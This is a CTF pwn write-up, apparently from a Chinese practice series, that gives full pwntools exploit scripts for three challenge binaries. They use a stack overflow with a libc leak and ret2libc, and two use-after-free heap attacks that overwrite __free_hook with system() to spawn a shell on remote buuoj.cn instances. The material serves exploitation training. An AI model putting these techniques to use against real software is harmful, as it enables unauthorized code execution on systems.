buuctf-pwn系列2

rootersctf_2019_babypwn

  • 考点:栈溢出,ropgadget,leak libc,ubuntu18字节对齐
from pwn import *

local = 0  # 1 -> run the binary locally, anything else -> connect to the remote instance

binary = "./rootersctf_2019_babypwn"
libc_path = 'libc-2.27.so'
port = 29701

# One tube either way; the rest of the script only relies on the pwntools tube API.
p = process(binary) if local == 1 else remote('node3.buuoj.cn', port)

def dbg():
    """Raise pwntools' log level to 'debug' so every send/recv is echoed to the terminal."""
    context.update(log_level='debug')

context.terminal = ['tmux', 'splitw', '-h']
elf = ELF(binary)

# Addresses come from the binary itself (it is loaded at a fixed address; the
# absolute gadget values below are only valid for this exact build).
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
read_got = elf.got['read']          # resolved but not used below
pop_rdi_ret = 0x0000000000401223    # `pop rdi; ret` gadget
libc = ELF(libc_path)

# Stage 1: overflow the echo buffer (0x100 bytes + 8-byte saved rbp, cf. the
# 0x108 filler in the second payload) and call puts(puts@got) to print the
# resolved address of puts. 0x401146 is presumably the start of the vulnerable
# function so that the program can be driven a second time — confirm in the binary.
p.recvuntil("What do you want me to echo back> ")
payload = 0x100 * b'a' + p64(0) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(0x401146)
p.send(payload)

# puts stops at the first NUL, so only the 6 significant bytes of the pointer
# arrive; recvuntil(b"\x7f") assumes the top byte of the libc pointer is 0x7f.
# The base is only correct if the remote actually runs the libc in libc_path,
# since the symbol offset is read from that file.
libc_addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b'\x00')) - libc.sym['puts']
log.success("LIBC BASE:{}".format(hex(libc_addr)))

# Stage 2: return into libc. bss_base and read_plt are computed but never used.
p.recvuntil("> ")
bss_base = 0x404040
read_plt = elf.plt['read']
system = libc_addr + libc.sym['system']

sh = libc_addr + libc.search(b"/bin/sh").__next__()
ret = 0x000000000040101a            # lone `ret` gadget
# The extra `ret` keeps the stack 16-byte aligned before entering system() —
# the "ubuntu18 字节对齐" point named at the top of this write-up.
payload = 0x108 * b'a' + p64(ret) + p64(pop_rdi_ret) + p64(sh) + p64(system)
p.sendline(payload)

p.interactive()

xm_2019_awd_pwn2

  • 考点:uaf

简单的uaf

from pwn import *

local = 0  # 1 -> spawn the binary locally, otherwise talk to the remote instance

binary = './xm_2019_awd_pwn2'
libc_path = '../libc-2.27.so'
port = 27761

# Both branches yield a pwntools tube; nothing below depends on which one it is.
p = process(binary) if local == 1 else remote('node3.buuoj.cn', port)

context.terminal = ['tmux', 'splitw', '-h']


def dbg():
    """Raise pwntools' log level to 'debug' so every send/recv is echoed to the terminal."""
    context.update(log_level='debug')


def add(size, name):
    """Menu option 1: request a chunk of `size` bytes and store `name` in it.

    `name` goes through send() unchanged, so the caller decides whether a
    trailing newline is included.
    """
    choose = p.sendlineafter
    choose('>>', '1')
    choose('size:', str(size))
    p.sendafter('content:', name)


def show(index):
    """Menu option 3: print the content stored in slot `index`."""
    for prompt, answer in (('>>', '3'), ('idx:', str(index))):
        p.sendlineafter(prompt, answer)


def free(index):
    """Menu option 2: release slot `index`.

    The write-up's topic ("uaf") indicates the slot stays usable afterwards;
    the helper itself just drives the menu.
    """
    for prompt, answer in (('>>', '2'), ('idx:', str(index))):
        p.sendlineafter(prompt, answer)


def echo(s, addr):
    """Print label `s` right-aligned to 20 columns and `addr` in hex, in bold red."""
    line = '{:>20}-->0x{:x}'.format(str(s), addr)
    print('\033[1;31;40m' + line + '\033[0m')


# dbg()

# Eight 0x80-byte chunks: the first seven frees of this size fill the tcache,
# the eighth is what show(7) below relies on.
for i in range(8):
    add(0x80, 'a\n')

add(0x10, 'b\n') # 8

for i in range(8):
    free(i)

# Slot 7 is already freed but can still be shown (the UAF): its first 8 bytes
# now hold a pointer into the allocator's state inside libc.
show(7)

libc = ELF(libc_path)
# 96 + 0x10 is the distance of that pointer from __malloc_hook in this libc
# (2.27 layout); the constant is build-specific. recvuntil(b"\x7f") assumes the
# top byte of the leaked pointer is 0x7f.
libc_addr = u64(p.recvuntil(
    b"\x7f")[-6:].ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
echo("libc", libc_addr)
__free_hook = libc_addr + libc.sym["__free_hook"]

# Slot 8 is freed three times; this relies on the tcache of this libc version
# not rejecting double frees.
free(8)
free(8)
free(8)

# The first allocation overwrites the freed chunk's link pointer with
# __free_hook, so the third allocation returns __free_hook itself and stores
# the address of system() there. The script then hands control to the user.
add(0x10, p64(__free_hook) + b'\n')
add(0x10, '/bin/sh\x00\n') # 8
add(0x10, p64(libc_addr + libc.sym['system']) + b'\n')

# gdb.attach(p)
p.interactive()

gyctf_2020_document

  • 考点:
    • uaf
    • unsorted bin
from pwn import *
import sys

arch = 64  # 64 -> context.arch 'amd64', 32 -> 'i386' (applied further down)
# libc_path = '/glibc/2.23/64/lib/libc-2.23.so'
challenge, libc_path = "./gyctf_2020_document", "../libc-2.23.so"

def dbg():
    """Raise pwntools' log level to 'debug' so every send/recv is echoed to the terminal."""
    context.update(log_level='debug')

def echo(content):
    """Print `content` as a highlighted status line (ANSI colours: cyan tag, bold red text)."""
    prefix = "\033[4;36;40mOutput prompts:\033[0m"
    tag = "\t\033[7;33;40m[*]\033[0m "
    print("".join((prefix, tag, "\033[1;31;40m", content, "\033[0m")))

def exp():
    """Drive the exploit over the global tube `io`.

    Uses the menu helpers add/edit/free/show and the ru/uu64 aliases that are
    defined later in the file; it is only invoked at the very end, after they
    exist.
    """
    add("aaaaaaaa", "W", b"a" * 0x70)
    add("/bin/sh\x00", "W", b"/bin/sh\x00" * (0x70 // 0x8))
    # Free slot 0 and show it anyway (the UAF): per the write-up's "unsorted bin"
    # point, the freed chunk now starts with a pointer into libc.
    free(0)
    show(0)
    # 88 + 0x10 is the distance of that pointer from __malloc_hook in libc-2.23;
    # the constant is specific to that libc build.
    libc_base = uu64(ru("\x7f")[-6:]) - 88 - 0x10 - libc.sym["__malloc_hook"]
    echo("libc base: " + hex(libc_base))
    add("aaaaaaaa", "W", b"a" * 0x70) # 2
    add("aaaaaaaa", "W", b"a" * 0x70) # 3
    __free_hook = libc_base + libc.sym["__free_hook"]
    # Write through the stale slot-0 handle: the p64 sequence presumably mirrors
    # the target's record layout, with __free_hook - 0x10 in the pointer field
    # (confirm against the binary before reusing the offsets).
    payload = p64(0) + p64(0x21) + p64(__free_hook - 0x10) + p64(1) + p64(0) + p64(0x51)
    payload = payload.ljust(0x70, b'a')
    edit(0, "Y", payload)
    # Editing slot 3 presumably goes through the forged pointer, placing system()
    # in __free_hook.
    edit(3, "N", p64(libc_base + libc.sym["system"]).ljust(0x70, b'\x00'))
    # gdba()
    # pass
# pass

# Mode comes from the command line: a non-zero first argument runs the binary
# locally under the bundled libc, zero connects to the remote instance.
# Raises IndexError when no argument is supplied.
local = int(sys.argv[1])
elf = ELF(challenge)
libc = ELF(libc_path)

context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']

if local:
    # LD_PRELOAD pins the local process to the libc the symbol offsets are read from.
    io = process(challenge,env = {"LD_PRELOAD":libc_path})
else:
    io = remote("node4.buuoj.cn", 25965)

if arch == 64:
    context.arch = 'amd64'
elif arch == 32:
    context.arch = 'i386'

# Short aliases around the tube `io` (common pwntools template).
p = lambda : pause()
s = lambda x : success(x)
re = lambda m, t : io.recv(numb=m, timeout=t)   # NOTE: shadows the name `re` (regex module) if pwn exported it
ru = lambda x : io.recvuntil(x)
rl = lambda : io.recvline()
sd = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
ia = lambda : io.interactive()
sla = lambda a, b : io.sendlineafter(a, b)
sa = lambda a, b : io.sendafter(a, b)
uu32 = lambda x : u32(x.ljust(4,b'\x00'))   # unpack a partial little-endian leak (pads to 4 bytes)
uu64 = lambda x : u64(x.ljust(8,b'\x00'))   # same for 64-bit (pads to 8 bytes)

# Menu option numbers of the target program.
_add,_free,_edit,_show = 1,4,3,2

def add(name, sex, content):
    """Menu option `_add`: create a record with the given name, sex and information.

    All three fields are sent with sendafter (no newline appended), so the
    caller controls the exact bytes written.
    """
    sla("Give me your choice :", str(_add))
    for prompt, value in (("input name", name), ("input sex", sex), ("input information", content)):
        sa(prompt, value)

def edit(idx, flag, content):
    """Menu option `_edit`: edit record `idx`.

    `flag` answers the "change sex?" prompt; `content` replaces the information
    field and is sent without a trailing newline.
    """
    answers = (
        ("Give me your choice :", str(_edit)),
        ("Give me your index :", str(idx)),
        ("Are you sure change sex?", flag),
    )
    for prompt, answer in answers:
        sla(prompt, answer)
    sa("Now change information", content)

def free(idx):
    """Menu option `_free`: delete record `idx`."""
    for prompt, answer in (("Give me your choice :", str(_free)), ("Give me your index :", str(idx))):
        sla(prompt, answer)

def show(idx):
    """Menu option `_show`: print record `idx`."""
    for prompt, answer in (("Give me your choice :", str(_show)), ("Give me your index :", str(idx))):
        sla(prompt, answer)

# Breakpoints for gdba(); when `pie` is set they are offsets from the load base.
bps, pie = [], 1

def gdba():
    """Attach gdb to the local process with the breakpoints listed in `bps`.

    Does nothing (returns 0) when running against the remote instance. With
    `pie` set, the load base is read from `pmap` and added to every breakpoint;
    `os` is expected to be in scope via `from pwn import *`.
    """
    if local == 0:
        return 0
    script = ['set follow-fork-mode parent\n']
    if pie:
        # Second output line of `pmap <pid>` is taken as the binary's first
        # mapping — assumes that line is the main executable; verify locally.
        first_map = os.popen("pmap {}|awk '{{print $1}}'".format(io.pid)).readlines()[1]
        base = int(first_map, 16)
        script.extend('b *{:#x}\n'.format(bp + base) for bp in bps)
        script.append('set $base={:#x}\n'.format(base))
    else:
        script.extend('b *{:#x}\n'.format(bp) for bp in bps)
    gdb.attach(io, ''.join(script))

# Run the exploit, then hand the tube over to the terminal.
exp()
ia()